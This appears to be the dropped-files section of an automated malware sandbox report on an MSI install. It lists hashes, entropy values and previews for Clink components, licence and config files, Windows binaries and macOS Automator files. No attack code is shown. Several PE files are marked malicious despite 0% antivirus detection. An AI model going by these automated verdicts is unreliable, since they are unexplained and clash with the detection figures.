                                                                                                                                                                                          Preview:.......................4...........................MPaste path into Terminus.V4JSMC46SY......m?..y...2Pr)..|.u...o/...|.Q1.$.^..Sv5j.@3...!.O|..^..Sv5j.@3...!.O|..
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:Mac OS X Code Requirement Set - 184 bytes
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):184
                                                                                                                                                                                          Entropy (8bit):3.7170939032012216
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3:+9sUlB9B/lE5lFuIFkIK9wNuPRuMFxuu//ul/Ll/Uk5b/:+9sUDc1FkNRove/q/Ll/v5b/
                                                                                                                                                                                          MD5:39073BC3B08A2B71C6FA76EA8C223F56
                                                                                                                                                                                          SHA1:157CD6BF75F987F96F2F817F807C0751319624FA
                                                                                                                                                                                          SHA-256:58F23EAEC5C16935C06811C49D46AC5E38B5E1750629ACCB2092423CE24F3414
                                                                                                                                                                                          SHA-512:8A6718BFB5E21D53FF7DB94AC7C6A28149194DCE91CCA3603184C19BB5A1FA06AFFF92BFB381D48349CBAA949F037F8F5B23A992689442F571F70A7A7843EC37
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:............................................Paste path into Terminus........................*.H..cd.........................*.H..cd.....................subject.OU..........V4JSMC46SY..
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:Mac OS X Code Directory version 20200 - 216 bytes
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):216
                                                                                                                                                                                          Entropy (8bit):5.949799967784248
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:6:yljFjW9FkNT8boEVkbNlombptKcpJhj3i9McpJhjo:ylFjWnxboEOJlf/JJhjS9DJhjo
                                                                                                                                                                                          MD5:CD03804F94EEE247CF8287CA1FB62AFA
                                                                                                                                                                                          SHA1:370644D691968ACE290EBF8ACCCC8AAE8B3369E3
                                                                                                                                                                                          SHA-256:395146FA338C9D5061FE7778058FD20BAAE475A95A8C00917BF9682D5F98F6E0
                                                                                                                                                                                          SHA-512:280E36F244C7CE806BCB7D5001967F41108A08A8FB21A534D5752EDBF0F385C382E728AE551841D38CEF8518EA8BFBDF7D06ADE92B004D4CB1E1D12EE4F6CE47
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:.......................4............ ..............MPaste path into Terminus.V4JSMC46SY...k.0:0../.]?..~R...b..{..p.}X.>...i5.h..F.^8..u.).. .B<.O4..G.{.z._.7=.../...=.D../..Ri.M.G.{.z._.7=.../...=.D../..Ri.M
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):2949
                                                                                                                                                                                          Entropy (8bit):5.075223870377909
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:48:c6ys/B551a2mFOyvQ75tCejztiOUH7m1yvQ7pfS1:9ysx0Qzz7+
                                                                                                                                                                                          MD5:2688E261AFB476EB303512C8629E8096
                                                                                                                                                                                          SHA1:B29804E7820C65261BD39A17868566C8C138A1F6
                                                                                                                                                                                          SHA-256:4994DAD665F60BDEED1429B30C84780EEF288DA813C6E1D56C4ACFC848C736CD
                                                                                                                                                                                          SHA-512:15914CE563D74714C7808A854CB9DCA477C4B89B3ED6C6E4820105B6ACD8B13EA8C54C43D00F334195B1566B82F42C13255CA450F6017005F9C2FDA8982CD57C
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-8"?>..<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">..<plist version="1.0">..<dict>...<key>files</key>...<dict/>...<key>files2</key>...<dict>....<key>QuickLook/Thumbnail.png</key>....<dict>.....<key>hash</key>.....<data>.....tv0Qtgo8zZ9+sQPQDNdKJHm7jeQ=.....</data>.....<key>hash2</key>.....<data>.....8nlfnBbkORcam9cE84KuxM9Lgf6hYU0jehepX8sSNDU=.....</data>....</dict>....<key>document.wflow</key>....<dict>.....<key>cdhash</key>.....<data>.....DwLo2M9xZ+aZGtMzRCGHhHB/wMY=.....</data>.....<key>requirement</key>.....<string>identifier document and anchor apple generic and certificate 1[field.1.2.840.113635.100.6.2.6] /* exists */ and certificate leaf[field.1.2.840.113635.100.6.1.13] /* exists */ and certificate leaf[subject.OU] = V4JSMC46SY</string>....</dict>...</dict>...<key>rules</key>...<dict>....<key>^Resources/</key>....<true/>....<key>^Resources/.*\.lproj/</key>....<dict>.....<key>optional</key
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):9042
                                                                                                                                                                                          Entropy (8bit):7.35643821745632
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:192:izr+RjG8P03zrA/znSzrxk6ceD13rWEWp7KSrv75alZ8P09r50poR:Wr+Q8GrqGru6drWTOSrNab8erOE
                                                                                                                                                                                          MD5:3AC2EAED0649BD0E1728BAA58E9CB27D
                                                                                                                                                                                          SHA1:5CF3957F7C924746EDF6FD15D20183E77B5B82D0
                                                                                                                                                                                          SHA-256:C1F0E27245DA212DE974FFA8B748592D5C39FA5801E3291FA34D010DD4F65772
                                                                                                                                                                                          SHA-512:AD5B82463B1B392809B3783590783C2B7085A8AF067E9F7F55D3C62F017E0163D23143EE0AEA49C6543544E3CCBFF9BD597A8EB1A33655D98EDB67EC3B8865FF
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):6224
                                                                                                                                                                                          Entropy (8bit):4.809822124260186
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:96:9ys1ED/+eoxAfSSRlG9UblpTADqnuZtJkSz:Is1EDGeoxAfdLjRanXz
                                                                                                                                                                                          MD5:2E0DB77D7697B2BAA94FD4C9E478126C
                                                                                                                                                                                          SHA1:580119A423739A6D43DA4A24F1D447F1149F4F9F
                                                                                                                                                                                          SHA-256:19D6BD6C3A38231B5A3C67F0835CA439186BA0CE011BE6C3D1E8DE642316BADF
                                                                                                                                                                                          SHA-512:E974A5BB92D774E35DCC7FFF68153BEEEBF36DC4DC93F60ACA434C434FD813BC358C67DF89E4911FD411A3D2DFA735F30726895EAA38B3770C1033CBE2BA05A6
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-8"?>..<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">..<plist version="1.0">..<dict>...<key>AMApplicationBuild</key>...<string>444.38</string>...<key>AMApplicationVersion</key>...<string>2.9</string>...<key>AMDocumentVersion</key>...<string>2</string>...<key>actions</key>...<array>....<dict>.....<key>action</key>.....<dict>......<key>AMAccepts</key>......<dict>.......<key>Container</key>.......<string>List</string>.......<key>Optional</key>.......<true/>.......<key>Types</key>.......<array>........<string>com.apple.cocoa.string</string>.......</array>......</dict>......<key>AMActionVersion</key>......<string>2.0.3</string>......<key>AMApplication</key>......<array>.......<string>Automator</string>......</array>......<key>AMParameterProperties</key>......<dict>.......<key>COMMAND_STRING</key>.......<dict/>.......<key>CheckedForUserDefaultShell</key>.......<dict/>.......<key>inputMethod</key>.......<
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (585), with CRLF line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):64732
                                                                                                                                                                                          Entropy (8bit):4.95790957286783
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:1536:EkLWZy1EAbB8fWbz9w3DVD6M8cJDYtXRaDNjvR:v1b2fWbz9wRD6M8c5YtCJvR
                                                                                                                                                                                          MD5:0EA69C6936AEBA37BF13E158CD0D9A00
                                                                                                                                                                                          SHA1:02EA7AC6DCC37ACDE7157141E931CCF1EBD94647
                                                                                                                                                                                          SHA-256:651118296E071EC26A2218E659B24549B11DFBF27DD80E8B966708AE8B361CD2
                                                                                                                                                                                          SHA-512:39C953D60FE91BCB91847C480D2E5CA997C718D85C72372CF8181BE5E8ED3ED9967170EA5FF01DD3EEEDAA383F34A408226B73026B922EC4EA8248CFE9245B73
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:# Changes....## Releases from [chrisant996/clink](https://github.com/chrisant996/clink) fork....### v1.2.9....- Added detection for possible antivirus interference when injecting Clink...- Ignore duplicate scripts paths when loading scripts...- Fixed [#118](https://github.com/chrisant996/clink/issues/118); inputrc is not read from state directory (regression introduced in v1.0.0).....### v1.2.8....- Fixed `...\` or `.../` to change directories (path separator after several dots)...- Fixed `/dirname/` to change directories (forward slashes when a directory is the only thing in the input line)...- Fixed [#114](https://github.com/chrisant996/clink/issues/114); "Clink already loaded in process" error when autorun is installed for both Current User and All Users...- Fixed [#113](https://github.com/chrisant996/clink/issues/113); forward slash translation didn't work with the `cd` command.....### v1.2.7....- Fixed [#113](https://github.com/chrisant996/clink/issues/113); `clink.slash_translati
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):35823
                                                                                                                                                                                          Entropy (8bit):4.622190512298306
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:768:A7Y+tNdSz3ZlqXOWoInuzx3Y8N3WiYD0a:AVtNIq1uzZY17
                                                                                                                                                                                          MD5:664AA96239B59B044722945D56F70200
                                                                                                                                                                                          SHA1:05D59582038226BA83AD0F96EADA4AD92A1DECEC
                                                                                                                                                                                          SHA-256:5F631FAE467C82B8CD28FD1EC425C816895A35F9D94E36BEE0E0164570E8E0F6
                                                                                                                                                                                          SHA-512:D237E2C990F7BA11A8FBB4244C82932D24025812651B22A80E4B6A9B3DB02EBBF6A52FF8AEEF88242D3DC450AACE97E12F8C60B57F197D28A2AFEF09079F3DAD
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview: GNU GENERAL PUBLIC LICENSE.. Version 3, 29 June 2007.... Copyright (C) 2007 Free Software Foundation, Inc. <http://fsf.org/>.. Everyone is permitted to copy and distribute verbatim copies.. of this license document, but changing it is not allowed..... Preamble.... The GNU General Public License is a free, copyleft license for..software and other kinds of works..... The licenses for most software and other practical works are designed..to take away your freedom to share and change the works. By contrast,..the GNU General Public License is intended to guarantee your freedom to..share and change all versions of a program--to make sure it remains free..software for all its users. We, the Free Software Foundation, use the..GNU General Public License for most of our software; it applies also to..any other work released this way by its authors. You can apply it to..your programs, too..... When we speak of free software
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):1499
                                                                                                                                                                                          Entropy (8bit):5.018268711106564
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:24:Bj+e4GmVLXgOsVhQ4kvpboWF4qwGuoaqCbBhBuPu1sIJFHQ64UyU:pvDmVzgT2ThboWF4qwGurRXuPuT7zyU
                                                                                                                                                                                          MD5:92F56A4F5897F221B6EEE82CD60C5EFF
                                                                                                                                                                                          SHA1:C9C89A5904B621BEFD4B16E9741AF5010E52C322
                                                                                                                                                                                          SHA-256:ACC35E35933C5388616A37750A77308DC9EA04118B9F3B9DBEEB88E795183D8F
                                                                                                                                                                                          SHA-512:7C3586332602AD3834B3727AAB033C622546CE2A3392160D9B430182A8E467BC7185E13E695FEA3A1C385EE5D06394426CDC2BAD63B5319B18F1479009F55444
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview::: Copyright (c) 2012 Martin Ridgers..:: License: http://opensource.org/licenses/MIT....@echo off..setlocal enableextensions..set clink_profile_arg=..set clink_quiet_arg=....:: Mimic cmd.exe's behaviour when starting from the start menu...if /i "%1"=="startmenu" (.. cd /d "%userprofile%".. shift..)....:: Check for the --profile option...if /i "%1"=="--profile" (.. set clink_profile_arg=--profile "%~2".. shift.. shift..)....:: Check for the --quiet option...if /i "%1"=="--quiet" (.. set clink_quiet_arg= --quiet.. shift..)....:: If the .bat is run without any arguments, then start a cmd.exe instance...if "%1"=="" (.. call :launch.. goto :end..)....:: Test for autorun...if defined CLINK_NOAUTORUN if /i "%1"=="inject" if /i "%2"=="--autorun" goto :end....:: Endlocal before inject tags the prompt...endlocal....:: Pass through to appropriate loader...if /i "%processor_architecture%"=="x86" (.. "%~dp0\clink_x86.exe" %*..) else if /i "%processor_architecture%"
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):247
                                                                                                                                                                                          Entropy (8bit):4.2815137009524635
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:6:DVyrc9bcwkzin/IrUJx7Bl8zNgMKHbAw6n:Ar+wwUiUQ+zSMckw6
                                                                                                                                                                                          MD5:B69240707FD9F4EA6725FC3CE33D2B14
                                                                                                                                                                                          SHA1:91E2D2F75C5FFF2D590DCDF06FDBBE65370CD358
                                                                                                                                                                                          SHA-256:223A982DE36886A5A33D388837CE8A79D336559178736EED4BDCA44E330D15B4
                                                                                                                                                                                          SHA-512:CB280F26F472321905FF246243C9071F90CA6AAACABBF98AD9C5D58AFE3EB9A39033BD941EDBE7240FEF95DD97687D15E153A84CF6B4F4F1D98C1CAD16650CEC
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:-- This file is intentionally blank...--..-- The old clink.lua file is no longer used, and this blank file ensures if a..-- new clink version is copied over an old clink version, it won't accidentally..-- use an obsolete leftover clink.lua file...
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):1838592
                                                                                                                                                                                          Entropy (8bit):6.449871061750084
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:49152:yHsyyrXGHoq8HO2AKxBwpOkyb6PrIhcffMraYa:rxrXqoqWS1ffM
                                                                                                                                                                                          MD5:4FFAA31F19440B338E62AC46E5810BC3
                                                                                                                                                                                          SHA1:C4491FFF894F40C65ED04CD7C9C43635EF0F44A3
                                                                                                                                                                                          SHA-256:FDEF73D692E2E181075BF43A05CD7EBE551F6B1BE31F4D471FF709F83A549612
                                                                                                                                                                                          SHA-512:F917D8A90E86F9542E56E8C80CDA7362BB3FEFDBBB7A094F5A518B35A74BB1394F5E7DFBC8A928A8DE7A0BC7B40D4D5E9CE7192D1207DC287C18305E8B2C7AAE
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B"s..C.S.C.S.C.S.1.R.C.S.1.R.C.S.1.R&C.S`,.S.C.ST6.RIC.ST6.R.C.ST6.R.C.S.1.R.C.S.C.S*B.S.6.R.C.S.6.R.C.S.6.S.C.S.6.R.C.SRich.C.S................PE..d....q.c.........." .....4..........p........................................@............`.........................................@5..`....5..........@.......\................,.. ...p.......................(.......8............P...............................text....3.......4.................. ..`.rdata.......P.......8..............@..@.data...XG...`...|...<..............@....pdata..\...........................@..@_RDATA..............................@..@.detourcp!......."..................@..@.detourd............................@....rsrc...@...........................@..@.reloc...,..........................@..B........................................................................................................
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):1482240
                                                                                                                                                                                          Entropy (8bit):6.730944992723702
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:24576:IY9jGPXSC7NbyQDX5CXRUHlcf9oGvc0zB1J/Y00PErwq95CMqEfV3Vke9zjAP:K97g6SbS0cuw/AFn9zkP
                                                                                                                                                                                          MD5:61333C309BD818A19F686C6871700BB2
                                                                                                                                                                                          SHA1:C3EBB1ED3A178ECD866059AFA5BF7C069765877A
                                                                                                                                                                                          SHA-256:2BEB5AEE0F570E28886AB99EBE7B0E8676300859C828D14AF78DEBD8AD5B3235
                                                                                                                                                                                          SHA-512:1747971DB0D885ECE9994CA262EAEB54FBED9FADBFEA95224119C568C7B6ADC786F832AA293B908E9C5F383415A0BEB209052C0FD99F4FDAA2E8FE0B3D287508
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s...7..7..7................(..Q...;..e...{..e..."..e..+....$..7...............6......6.....6..Rich7..........PE..L...uq.c...........!.........R.......X....................................................@.........................@V..`....V..........@...............................p...................@.......p...@...............,............................text............................... ..`.rdata...o.......p..................@..@.data........p...J...b..............@....detourcH....`......................@..@.detourd............................@....rsrc...@...........................@..@.reloc..............................@..B................................................................................................................................................................................................................
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):2147
                                                                                                                                                                                          Entropy (8bit):4.197234722555126
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:48:bpw45+rdlV3klke8hGyNwd2CyNwd2eyNwdfVwQG:t5mV0Olh3NwwbNww/NwdVc
                                                                                                                                                                                          MD5:E1F0F9220288BD4615B51C812FECF6BF
                                                                                                                                                                                          SHA1:C3FBE7E26CFFA1D947D2484C7DF9A98565661CBE
                                                                                                                                                                                          SHA-256:1F8ED9E3AEBF192BC194B334A88D3E04F12B1AEFB7C26E64EBB8178D0306FBDF
                                                                                                                                                                                          SHA-512:1D0F97D9E6D380B43FF06E4E1A020D2BE4606A30CCEE74F9B5E23DBD03176F6CD955AA6E668FE8C17E5BB4A3C9EB48A1220622BFE939774E479839B91915B12C
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:set bell-style visible..set completion-ignore-case on..set completion-map-case on..set completion-display-width 106..set output-meta on..set skip-completed-text on..set convert-meta on...."\e`s": backward-word # ctrl-left.."\e`t": forward-word # ctrl-right.."\e`O": end-of-line # end.."\e`G": beginning-of-line # home.."\e`S": delete-char # del.."\e`c": page-up # shift page-up.."\e`u": kill-line # ctrl+end.."\e`w": backward-kill-line # ctrl+home.."\e`I": history-search-backward # page-up.."\e`Q": history-search-forward # page-down....set keymap emacs.."\t": clink-completion-shim..C-v: paste-from-clipboard..C-q: reload-lua-state..C-z: undo..M-h: show-rl-help..M-C-c: copy-line-to-clipboard..C-c: ctrl-c..M-a: "..\\"....
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):25904
                                                                                                                                                                                          Entropy (8bit):7.2101363709041735
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:384:mTmIPNyb8E9VF6IYinAM+oOZyByVGR2Ei/+IYigZyByVWq1/wfT3ir2WSx7bLZz+:uEpYinAMxOYBGJYigYBGs3iPmbLx+
                                                                                                                                                                                          MD5:D0A1C2BD327021EB3B7D4D64EA7DE1FA
                                                                                                                                                                                          SHA1:A2A0A47882F9918D8CE5CA60906624CDD9086EF1
                                                                                                                                                                                          SHA-256:C81CD3BC1BE1453237B267F8B63B01A7580D7E100EDFC05852A8DD0BDEA8FD6E
                                                                                                                                                                                          SHA-512:D9D7D8757DB16472D175A3711AAF06846D9C8CAAEA28F51509CE8D77C574ABA523A00FD3F94F13186A7F9D02BD057D0165096D4205B1EBD45D920CFF5E7B2300
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............Ox..Ox..Ox..:y..Ox..=y..Ox..Oy..Ox..:q..Ox..:x..Ox..:...Ox..:z..Ox.Rich.Ox.................PE..d....q.c.........."............................@.............................P......rP....`.........................................."..T...D#..<....@..@....0..........0S........... ..p............................................ ..P............................text............................... ..`.rdata....... ......................@..@.pdata.......0......................@..@.rsrc...@....@......................@..@................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):25392
                                                                                                                                                                                          Entropy (8bit):7.262798670381018
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:768:9EpYinAMxOYBGCYmEYigYBGqL3iPmbLDM:27HxVGCY17DGqT77M
                                                                                                                                                                                          MD5:EAADD496E2AB711795F3CDB90A312456
                                                                                                                                                                                          SHA1:499FDA2A2C6E0E1825F1DCC740F0666B4A6D9EFB
                                                                                                                                                                                          SHA-256:5C1ACB13CBF6853328C80574C87DE7AD21C3D2E02B763AB99AD7B85199DA5B8C
                                                                                                                                                                                          SHA-512:3855544CA0EE76AD40FF8886E10E0527D07254E17D421F7ECB3B9A5321C1751AC1574BC0D240FCC98BF61FB1DB25B3A38AA63059EBF6A9AA72D3A011259CD031
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):539
                                                                                                                                                                                          Entropy (8bit):4.072004224137913
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:12:UAV8zfBGDWK/wmxNJMS/pSklfbL87j/fBKGAv:UAezfBGVoUNP/pSkljY7jXPK
                                                                                                                                                                                          MD5:CFC0F80F23092FED002A11623066A996
                                                                                                                                                                                          SHA1:A2A4BC331418EDD1AE517EDA4D3D249CF570186E
                                                                                                                                                                                          SHA-256:981FF49A6AAB13BF86B7EE1EF21C3E49D0F24F29EA81BCE6A722C78BF8750E42
                                                                                                                                                                                          SHA-512:C84E3C8566CB3BC97EF6E16D2327F2F876F38CB29CB3565B6018C3C10E504B516C814318841D89C0E19A02C05BB8DB62A70894A99D9578327E81A4EB9AD76BB0
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:# When this file is named "default_inputrc" and is in the binaries..# directory or profile directory, it provides enhanced default settings.....# Override the built-in Readline defaults with ones that provide a more..# enhanced Clink experience.....colored-completion-prefix on..colored-stats on..mark-symlinked-directories on..completion-auto-query-items on..history-point-at-end-of-anchored-search on..search-ignore-case on....
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):1581
                                                                                                                                                                                          Entropy (8bit):4.091082670888414
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:24:UAeZBGVoULqpSkl204QP6/fSh4XO6JhA395Jb3cQkQ0:ZOB9+Nks9CRb3cVh
                                                                                                                                                                                          MD5:3F594B7A0E1593AEC734C59913C50A57
                                                                                                                                                                                          SHA1:C0B250A1223DA8C6B3684E94F12FBD96E1D0A460
                                                                                                                                                                                          SHA-256:54844F91F31D513FD22F0822A7F2C48F69C1DFF936F161DA28E09E759C57AB9E
                                                                                                                                                                                          SHA-512:D5DF5AA5F8AF88A709C287994DDE744EA8482117C4505E0B4A49B64591553ED8D0EE49DD96C4DFBC6363CB8D1DE5B8A206192D462CFA9AD207D09148451D978D
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:# When this file is named "default_settings" and is in the binaries..# directory or profile directory, it provides enhanced default settings.....# Override built-in default settings with ones that provide a more..# enhanced Clink experience.....autosuggest.enable = True..clink.default_bindings = windows..cmd.ctrld_exits = False..color.arginfo = sgr 38;5;172..color.argmatcher = sgr 1;38;5;40..color.cmd = sgr 1;38;5;231..color.cmdredir = sgr 38;5;172..color.cmdsep = sgr 38;5;214..color.comment_row = sgr 38;5;87;48;5;18..color.description = sgr 38;5;39..color.doskey = sgr 1;38;5;75..color.executable = sgr 1;38;5;33..color.filtered = sgr 38;5;231..color.flag = sgr 38;5;117..color.hidden = sgr 38;5;160..color.histexpa
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):1622832
                                                                                                                                                                                          Entropy (8bit):7.97733508112384
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:24576:H8U9+A6KdMt7ZRuYfuv9dTWGNj0GvXFGfkRssBUEt3kRQrf7zSIBDICweAVdEY2Y:cUUvltf6SGd/FGfIsTE665h0dEY2nY
                                                                                                                                                                                          MD5:8FE64DA09AF371B02A31828415ECE8F3
                                                                                                                                                                                          SHA1:5B5C90DCD425C814B555A4567405601AA977EE0B
                                                                                                                                                                                          SHA-256:8279696C1D78B14618500E9135886A3667B9DECC65946F3729002E4BFDBB20AB
                                                                                                                                                                                          SHA-512:E49F9B1C9D33364101AD2FD4F2C5ED030700CC941BB469CF2CE7D5B32C51CAB9E62B265E05CBD92435453E7E4008C9990BEA532298676F7D81E5D6DCDC2F590B
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):40568
                                                                                                                                                                                          Entropy (8bit):6.636568875112838
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:768:GiRkQ10rr/40ev7+klSHFENgf7Cef8rMYAyajUCG/zwD5mqukbnno0tDfGQ8cCq8:9k/H40eqks8r73IcvoYOyh1a2735PxYU
                                                                                                                                                                                          MD5:AB0C3CEB2AAB0D0443E5631F327123A2
                                                                                                                                                                                          SHA1:ACC4B1E6FF452384A5A8FD534FEED872859AE0E2
                                                                                                                                                                                          SHA-256:85942CB9DF0E50D273A15738D5C7B17651DD41431C78EC31C8C4CD93F63702DA
                                                                                                                                                                                          SHA-512:2A3465E795F92515EE8146DF83696E71A2777C392AE2D0DFCD5234BBAEFA6C3B299ABF19FB4836A821DC8B0FE3BE462F715E59A87D38957C30B2826529251551
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):306214
                                                                                                                                                                                          Entropy (8bit):4.392850925698206
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3072:ogusbBDoCIdRSt25iD1Z3yAcCLi9wfuwWMvDdkbMzaQ:ogus9oCM9OUYffnWYWbIF
                                                                                                                                                                                          MD5:AEDD1B80A8140B94C00DB3C0B9485772
                                                                                                                                                                                          SHA1:2DC8444E599438ED37A31EBFE7F8859AF7FAC631
                                                                                                                                                                                          SHA-256:C1DA41052ABE31791AE90A9DBE54442A641E1ECBB018EF35C44E7AED05B8F72E
                                                                                                                                                                                          SHA-512:3E06CB550F46285D8DC81D1F082732C07E9C9D81ABE931E859262C7BA699D4EB9737581F5A5C5174E09BB0FC0561A9DE46298714CED38F453F922F9536C67D0C
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):679161
                                                                                                                                                                                          Entropy (8bit):5.217457437935302
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:6144:m/h8ML2Zu/Bg90Ws9oCM9Otxh6vtDINPbIgTtLAkW/cB2Z0JZkQXEzBO+lZ:myMSZu/Bg90BuCzIP/+2ZGZazJlZ
                                                                                                                                                                                          MD5:0C259ECBB12E6F3F0E076E6200221489
                                                                                                                                                                                          SHA1:3DE53DCAFDCE24C151DD1812769B46ACEA77C90C
                                                                                                                                                                                          SHA-256:83A8345EA197020E07FE2CF53E74F31D0CC632CA1537F5C9C1DB2FB2665AB04F
